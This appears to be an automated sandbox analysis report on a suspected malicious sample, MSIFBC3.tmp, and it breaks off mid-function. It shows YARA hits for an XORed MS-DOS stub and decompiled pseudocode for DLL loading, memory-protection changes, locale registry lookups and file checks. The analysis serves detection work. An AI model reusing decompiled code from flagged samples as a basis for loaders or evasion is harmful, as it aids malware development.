                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000003.406745863.0000025C96370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000026.00000000.409308294.0000025C96C80000.00000040.00000001.sdmp, Author: Florian Roth

                                                                                  Chronological Activities

                                                                                  Disassembly

                                                                                  Code Analysis

                                                                                  Reset < >

                                                                                    Analysis Process: MSIFBC3.tmp PID: 4928 Parent PID: 7056 MSIFBC3.tmpCOMMON

                                                                                    Executed Functions

                                                                                    Function 004B5114, Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 165libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E004B5114(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				long _t39;
				_Unknown_base(*)()* _t42;
				_Unknown_base(*)()* _t43;
				_Unknown_base(*)()* _t46;
				signed int _t51;
				void* _t111;
				void* _t112;
				intOrPtr _t129;
				struct HINSTANCE__* _t148;
				intOrPtr* _t150;
				intOrPtr _t152;
				intOrPtr _t153;

				_t152 = _t153;
				_t112 = 7;
				do {
					_push(0);
					_push(0);
					_t112 = _t112 - 1;
				} while (_t112 != 0);
				_push(_t152);
				_push(0x4b5388);
				_push( *[fs:eax]);
				 *[fs:eax] = _t153;
				 *0x4be664 =  *0x4be664 - 1;
				if( *0x4be664 >= 0) {
					L19:
					_pop(_t129);
					 *[fs:eax] = _t129;
					_push(0x4b538f);
					return E00407A80( &_v60, 0xe);
				} else {
					_t148 = GetModuleHandleW(L"kernel32.dll");
					_t39 = GetVersion();
					_t111 = 0;
					if(_t39 != 0x600) {
						_t150 = GetProcAddress(_t148, "SetDefaultDllDirectories");
						if(_t150 != 0) {
							 *_t150(0x800);
							asm("sbb ebx, ebx");
							_t111 = 1;
						}
					}
					if(_t111 == 0) {
						_t46 = GetProcAddress(_t148, "SetDllDirectoryW");
						if(_t46 != 0) {
							 *_t46(0x4b53e4);
						}
						E0040E520( &_v8);
						E00407E00(0x4be668, _v8);
						if( *0x4be668 != 0) {
							_t51 =  *0x4be668;
							if(_t51 != 0) {
								_t51 =  *(_t51 - 4);
							}
							if( *((short*)( *0x4be668 + _t51 * 2 - 2)) != 0x5c) {
								E004086E4(0x4be668, 0x4b53f4);
							}
							E0040873C( &_v12, L"uxtheme.dll",  *0x4be668);
							E0040E54C(_v12, _t111);
							E0040873C( &_v16, L"userenv.dll",  *0x4be668);
							E0040E54C(_v16, _t111);
							E0040873C( &_v20, L"setupapi.dll",  *0x4be668);
							E0040E54C(_v20, _t111);
							E0040873C( &_v24, L"apphelp.dll",  *0x4be668);
							E0040E54C(_v24, _t111);
							E0040873C( &_v28, L"propsys.dll",  *0x4be668);
							E0040E54C(_v28, _t111);
							E0040873C( &_v32, L"dwmapi.dll",  *0x4be668);
							E0040E54C(_v32, _t111);
							E0040873C( &_v36, L"cryptbase.dll",  *0x4be668);
							E0040E54C(_v36, _t111);
							E0040873C( &_v40, L"oleacc.dll",  *0x4be668);
							E0040E54C(_v40, _t111);
							E0040873C( &_v44, L"version.dll",  *0x4be668);
							E0040E54C(_v44, _t111);
							E0040873C( &_v48, L"profapi.dll",  *0x4be668);
							E0040E54C(_v48, _t111);
							E0040873C( &_v52, L"comres.dll",  *0x4be668);
							E0040E54C(_v52, _t111);
							E0040873C( &_v56, L"clbcatq.dll",  *0x4be668);
							E0040E54C(_v56, _t111);
							E0040873C( &_v60, L"ntmarta.dll",  *0x4be668);
							E0040E54C(_v60, _t111);
						}
					}
					_t42 = GetProcAddress(_t148, "SetSearchPathMode");
					if(_t42 != 0) {
						 *_t42(0x8001);
					}
					_t43 = GetProcAddress(_t148, "SetProcessDEPPolicy");
					if(_t43 != 0) {
						 *_t43(1); // executed
					}
					goto L19;
				}
			}





























                                                                                    0x004b5115
                                                                                    0x004b5117
                                                                                    0x004b511c
                                                                                    0x004b511c
                                                                                    0x004b511e
                                                                                    0x004b5120
                                                                                    0x004b5120
                                                                                    0x004b5128
                                                                                    0x004b5129
                                                                                    0x004b512e
                                                                                    0x004b5131
                                                                                    0x004b5134
                                                                                    0x004b513b
                                                                                    0x004b536d
                                                                                    0x004b536f
                                                                                    0x004b5372
                                                                                    0x004b5375
                                                                                    0x004b5387
                                                                                    0x004b5141
                                                                                    0x004b514b
                                                                                    0x004b514d
                                                                                    0x004b5154
                                                                                    0x004b515a
                                                                                    0x004b5167
                                                                                    0x004b516b
                                                                                    0x004b5172
                                                                                    0x004b5177
                                                                                    0x004b5179
                                                                                    0x004b5179
                                                                                    0x004b516b
                                                                                    0x004b517c
                                                                                    0x004b5188
                                                                                    0x004b518f
                                                                                    0x004b5196
                                                                                    0x004b5196
                                                                                    0x004b519b
                                                                                    0x004b51a8
                                                                                    0x004b51b4
                                                                                    0x004b51ba
                                                                                    0x004b51c1
                                                                                    0x004b51c6
                                                                                    0x004b51c6
                                                                                    0x004b51d4
                                                                                    0x004b51e0
                                                                                    0x004b51e0
                                                                                    0x004b51f3
                                                                                    0x004b51fb
                                                                                    0x004b520e
                                                                                    0x004b5216
                                                                                    0x004b5229
                                                                                    0x004b5231
                                                                                    0x004b5244
                                                                                    0x004b524c
                                                                                    0x004b525f
                                                                                    0x004b5267
                                                                                    0x004b527a
                                                                                    0x004b5282
                                                                                    0x004b5295
                                                                                    0x004b529d
                                                                                    0x004b52b0
                                                                                    0x004b52b8
                                                                                    0x004b52cb
                                                                                    0x004b52d3
                                                                                    0x004b52e6
                                                                                    0x004b52ee
                                                                                    0x004b5301
                                                                                    0x004b5309
                                                                                    0x004b531c
                                                                                    0x004b5324
                                                                                    0x004b5337
                                                                                    0x004b533f
                                                                                    0x004b533f
                                                                                    0x004b51b4
                                                                                    0x004b534a
                                                                                    0x004b5351
                                                                                    0x004b5358
                                                                                    0x004b5358
                                                                                    0x004b5360
                                                                                    0x004b5367
                                                                                    0x004b536b
                                                                                    0x004b536b
                                                                                    0x00000000
                                                                                    0x004b5367

                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B5146
                                                                                    • GetVersion.KERNEL32(kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B514D
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 004B5162
                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 004B5188
                                                                                      • Part of subcall function 0040E54C: SetErrorMode.KERNEL32(00008000), ref: 0040E55A
                                                                                      • Part of subcall function 0040E54C: LoadLibraryW.KERNEL32(00000000,00000000,0040E5AE,?,00000000,0040E5CC,?,00008000), ref: 0040E58F
                                                                                    • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004B534A
                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004B5360
                                                                                    • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,00000000,004B5388,?,?,?,?,00000000,00000000), ref: 004B536B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorHandleLibraryLoadModeModulePolicyProcessVersion
                                                                                    • String ID: SetDefaultDllDirectories$SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$apphelp.dll$clbcatq.dll$comres.dll$cryptbase.dll$dwmapi.dll$hK$hK$kernel32.dll$ntmarta.dll$oleacc.dll$profapi.dll$propsys.dll$setupapi.dll$userenv.dll$uxtheme.dll$version.dll
                                                                                    • API String ID: 2248137261-3182217745
                                                                                    • Opcode ID: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                    • Instruction ID: 14362f36823de93a6bafc63c1bb5288ecf7b8ac372eee3bc1917329a49ba756d
                                                                                    • Opcode Fuzzy Hash: 68b2adb77f8f7151d30e1a894141e6e7486eaa9f98baa6450b00b79ea83e97ab
                                                                                    • Instruction Fuzzy Hash: 57513C34601504ABE701EBA6DC82FDEB3A5AB94348BA4493BE40077395DF7C9D428B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004AF91C, Relevance: 7.6, APIs: 5, Instructions: 80memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 100%
                                                                                    			E004AF91C(void* __eax) {
				char _v44;
				struct _SYSTEM_INFO _v80;
				long _v84;
				char _v88;
				long _t22;
				int _t28;
				void* _t37;
				struct _MEMORY_BASIC_INFORMATION* _t40;
				long _t41;
				void** _t42;

				_t42 =  &(_v80.dwPageSize);
				 *_t42 = __eax;
				_t40 =  &_v44;
				GetSystemInfo( &_v80); // executed
				_t22 = VirtualQuery( *_t42, _t40, 0x1c);
				if(_t22 == 0) {
					L17:
					return _t22;
				} else {
					while(1) {
						_t22 = _t40->AllocationBase;
						if(_t22 !=  *_t42) {
							goto L17;
						}
						if(_t40->State != 0x1000 || (_t40->Protect & 0x00000001) != 0) {
							L15:
							_t22 = VirtualQuery(_t40->BaseAddress + _t40->RegionSize, _t40, 0x1c);
							if(_t22 == 0) {
								goto L17;
							}
							continue;
						} else {
							_v88 = 0;
							_t41 = _t40->Protect;
							if(_t41 == 1 || _t41 == 2 || _t41 == 0x10 || _t41 == 0x20) {
								_t28 = VirtualProtect(_t40->BaseAddress, _t40->RegionSize, 0x40,  &_v84); // executed
								if(_t28 != 0) {
									_v88 = 1;
								}
							}
							_t37 = 0;
							while(_t37 < _t40->RegionSize) {
								E004AF914(_t40->BaseAddress + _t37);
								_t37 = _t37 + _v80.dwPageSize;
							}
							if(_v88 != 0) {
								VirtualProtect( *_t40, _t40->RegionSize, _v84,  &_v84); // executed
							}
							goto L15;
						}
					}
					goto L17;
				}
			}













                                                                                    0x004af920
                                                                                    0x004af923
                                                                                    0x004af926
                                                                                    0x004af92f
                                                                                    0x004af93b
                                                                                    0x004af942
                                                                                    0x004af9ee
                                                                                    0x004af9ee
                                                                                    0x004af948
                                                                                    0x004af9db
                                                                                    0x004af9db
                                                                                    0x004af9e1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af954
                                                                                    0x004af9c7
                                                                                    0x004af9d2
                                                                                    0x004af9d9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004af95c
                                                                                    0x004af95c
                                                                                    0x004af961
                                                                                    0x004af967
                                                                                    0x004af986
                                                                                    0x004af98d
                                                                                    0x004af98f
                                                                                    0x004af98f
                                                                                    0x004af98d
                                                                                    0x004af994
                                                                                    0x004af9a5
                                                                                    0x004af99c
                                                                                    0x004af9a1
                                                                                    0x004af9a1
                                                                                    0x004af9af
                                                                                    0x004af9c2
                                                                                    0x004af9c2
                                                                                    0x00000000
                                                                                    0x004af9af
                                                                                    0x004af954
                                                                                    0x00000000
                                                                                    0x004af9db

                                                                                    APIs
                                                                                    • GetSystemInfo.KERNEL32(?), ref: 004AF92F
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?), ref: 004AF93B
                                                                                    • VirtualProtect.KERNEL32(?,?,00000040,0000001C,?,?,0000001C), ref: 004AF986
                                                                                    • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2441996862-0
                                                                                    • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                    • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                                    • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                    • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040B044, Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 73%
                                                                                    			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
				char _v8;
				short _v12;
				void* _v16;
				char _v20;
				char _v24;
				void* _t29;
				void* _t40;
				intOrPtr* _t44;
				intOrPtr _t55;
				void* _t61;

				_push(__ebx);
				_v24 = 0;
				_v20 = 0;
				_t44 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t61);
				_push(0x40b104);
				_push( *[fs:eax]);
				 *[fs:eax] = _t61 + 0xffffffec;
				_t21 =  &_v16;
				L00403730();
				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
				E0040858C( &_v20, 4,  &_v16);
				E0040873C(_t44, _v20, _v8);
				_t29 = E0040AEF4( *_t44, _t44); // executed
				if(_t29 == 0) {
					_v12 = 0;
					E0040858C( &_v24, 4,  &_v16);
					E0040873C(_t44, _v24, _v8);
					_t40 = E0040AEF4( *_t44, _t44); // executed
					if(_t40 == 0) {
						E00407A20(_t44);
					}
				}
				_pop(_t55);
				 *[fs:eax] = _t55;
				_push(E0040B10B);
				E00407A80( &_v24, 2);
				return E00407A20( &_v8);
			}













                                                                                    0x0040b04a
                                                                                    0x0040b04d
                                                                                    0x0040b050
                                                                                    0x0040b053
                                                                                    0x0040b055
                                                                                    0x0040b05b
                                                                                    0x0040b062
                                                                                    0x0040b063
                                                                                    0x0040b068
                                                                                    0x0040b06b
                                                                                    0x0040b070
                                                                                    0x0040b076
                                                                                    0x0040b07f
                                                                                    0x0040b08f
                                                                                    0x0040b09c
                                                                                    0x0040b0a3
                                                                                    0x0040b0aa
                                                                                    0x0040b0ac
                                                                                    0x0040b0bd
                                                                                    0x0040b0ca
                                                                                    0x0040b0d1
                                                                                    0x0040b0d8
                                                                                    0x0040b0dc
                                                                                    0x0040b0dc
                                                                                    0x0040b0d8
                                                                                    0x0040b0e3
                                                                                    0x0040b0e6
                                                                                    0x0040b0e9
                                                                                    0x0040b0f6
                                                                                    0x0040b103

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                                      • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                      • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                    • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                                    • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                    • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040AEF4, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 46%
                                                                                    			E0040AEF4(char __eax, signed int __ebx) {
				char _v8;
				struct _WIN32_FIND_DATAW _v600;
				void* _t15;
				intOrPtr _t24;
				void* _t27;

				_push(__ebx);
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t27);
				_push(0x40af52);
				_push( *[fs:eax]);
				 *[fs:eax] = _t27 + 0xfffffdac;
				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
					FindClose(_t15);
				}
				_pop(_t24);
				 *[fs:eax] = _t24;
				_push(E0040AF59);
				return E00407A20( &_v8);
			}








                                                                                    0x0040aefd
                                                                                    0x0040aefe
                                                                                    0x0040af04
                                                                                    0x0040af0b
                                                                                    0x0040af0c
                                                                                    0x0040af11
                                                                                    0x0040af14
                                                                                    0x0040af27
                                                                                    0x0040af34
                                                                                    0x0040af37
                                                                                    0x0040af37
                                                                                    0x0040af3e
                                                                                    0x0040af41
                                                                                    0x0040af44
                                                                                    0x0040af51

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                    • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                                    • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                    • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040AB18, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 173registryCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 78%
                                                                                    			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
				char _v8;
				char* _v12;
				void* _v16;
				int _v20;
				short _v542;
				long _t51;
				long _t85;
				long _t87;
				long _t89;
				long _t91;
				long _t93;
				void* _t97;
				intOrPtr _t106;
				intOrPtr _t108;
				void* _t112;
				void* _t113;
				intOrPtr _t114;

				_t112 = _t113;
				_t114 = _t113 + 0xfffffde4;
				_t97 = __edx;
				_v8 = __eax;
				E00407B04(_v8);
				_push(_t112);
				_push(0x40ad3d);
				_push( *[fs:eax]);
				 *[fs:eax] = _t114;
				if(_v8 != 0) {
					E0040A34C( &_v542, E004084EC(_v8), 0x105);
				} else {
					GetModuleFileNameW(0,  &_v542, 0x105);
				}
				if(_v542 == 0) {
					L18:
					_pop(_t106);
					 *[fs:eax] = _t106;
					_push(E0040AD44);
					return E00407A20( &_v8);
				} else {
					_v12 = 0;
					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
					if(_t51 == 0) {
						L10:
						_push(_t112);
						_push(0x40ad20);
						_push( *[fs:eax]);
						 *[fs:eax] = _t114;
						E0040A928( &_v542, 0x105);
						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
								_v12 = E004053F0(_v20);
								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
								E00408550(_t97, _v12);
							}
						} else {
							_v12 = E004053F0(_v20);
							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
							E00408550(_t97, _v12);
						}
						_pop(_t108);
						 *[fs:eax] = _t108;
						_push(E0040AD27);
						if(_v12 != 0) {
							E0040540C(_v12);
						}
						return RegCloseKey(_v16);
					} else {
						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
						if(_t85 == 0) {
							goto L10;
						} else {
							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
							if(_t87 == 0) {
								goto L10;
							} else {
								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
								if(_t89 == 0) {
									goto L10;
								} else {
									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
									if(_t91 == 0) {
										goto L10;
									} else {
										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
										if(_t93 != 0) {
											goto L18;
										} else {
											goto L10;
										}
									}
								}
							}
						}
					}
				}
			}




















                                                                                    0x0040ab19
                                                                                    0x0040ab1b
                                                                                    0x0040ab22
                                                                                    0x0040ab24
                                                                                    0x0040ab2a
                                                                                    0x0040ab31
                                                                                    0x0040ab32
                                                                                    0x0040ab37
                                                                                    0x0040ab3a
                                                                                    0x0040ab41
                                                                                    0x0040ab6d
                                                                                    0x0040ab43
                                                                                    0x0040ab51
                                                                                    0x0040ab51
                                                                                    0x0040ab7a
                                                                                    0x0040ad27
                                                                                    0x0040ad29
                                                                                    0x0040ad2c
                                                                                    0x0040ad2f
                                                                                    0x0040ad3c
                                                                                    0x0040ab80
                                                                                    0x0040ab82
                                                                                    0x0040ab9a
                                                                                    0x0040aba1
                                                                                    0x0040ac41
                                                                                    0x0040ac43
                                                                                    0x0040ac44
                                                                                    0x0040ac49
                                                                                    0x0040ac4c
                                                                                    0x0040ac5a
                                                                                    0x0040ac7b
                                                                                    0x0040acca
                                                                                    0x0040acd4
                                                                                    0x0040acec
                                                                                    0x0040acf6
                                                                                    0x0040acf6
                                                                                    0x0040ac7d
                                                                                    0x0040ac85
                                                                                    0x0040ac9f
                                                                                    0x0040aca9
                                                                                    0x0040aca9
                                                                                    0x0040acfd
                                                                                    0x0040ad00
                                                                                    0x0040ad03
                                                                                    0x0040ad0c
                                                                                    0x0040ad11
                                                                                    0x0040ad11
                                                                                    0x0040ad1f
                                                                                    0x0040aba7
                                                                                    0x0040abbc
                                                                                    0x0040abc3
                                                                                    0x00000000
                                                                                    0x0040abc5
                                                                                    0x0040abda
                                                                                    0x0040abe1
                                                                                    0x00000000
                                                                                    0x0040abe3
                                                                                    0x0040abf8
                                                                                    0x0040abff
                                                                                    0x00000000
                                                                                    0x0040ac01
                                                                                    0x0040ac16
                                                                                    0x0040ac1d
                                                                                    0x00000000
                                                                                    0x0040ac1f
                                                                                    0x0040ac34
                                                                                    0x0040ac3b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040ac3b
                                                                                    0x0040ac1d
                                                                                    0x0040abff
                                                                                    0x0040abe1
                                                                                    0x0040abc3
                                                                                    0x0040aba1

                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                                    • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                    • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                                    • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                    • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040426C, Relevance: 12.2, APIs: 8, Instructions: 221sleepCOMMON
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 91%
                                                                                    			E0040426C(void* __eax, signed int __edi, void* __ebp) {
				struct _MEMORY_BASIC_INFORMATION _v44;
				void* _v48;
				signed int __ebx;
				void* _t58;
				signed int _t61;
				int _t65;
				signed int _t67;
				void _t70;
				int _t71;
				signed int _t78;
				void* _t79;
				signed int _t81;
				intOrPtr _t82;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				signed int _t92;
				void* _t96;
				signed int _t99;
				void* _t103;
				intOrPtr _t104;
				void* _t106;
				void* _t108;
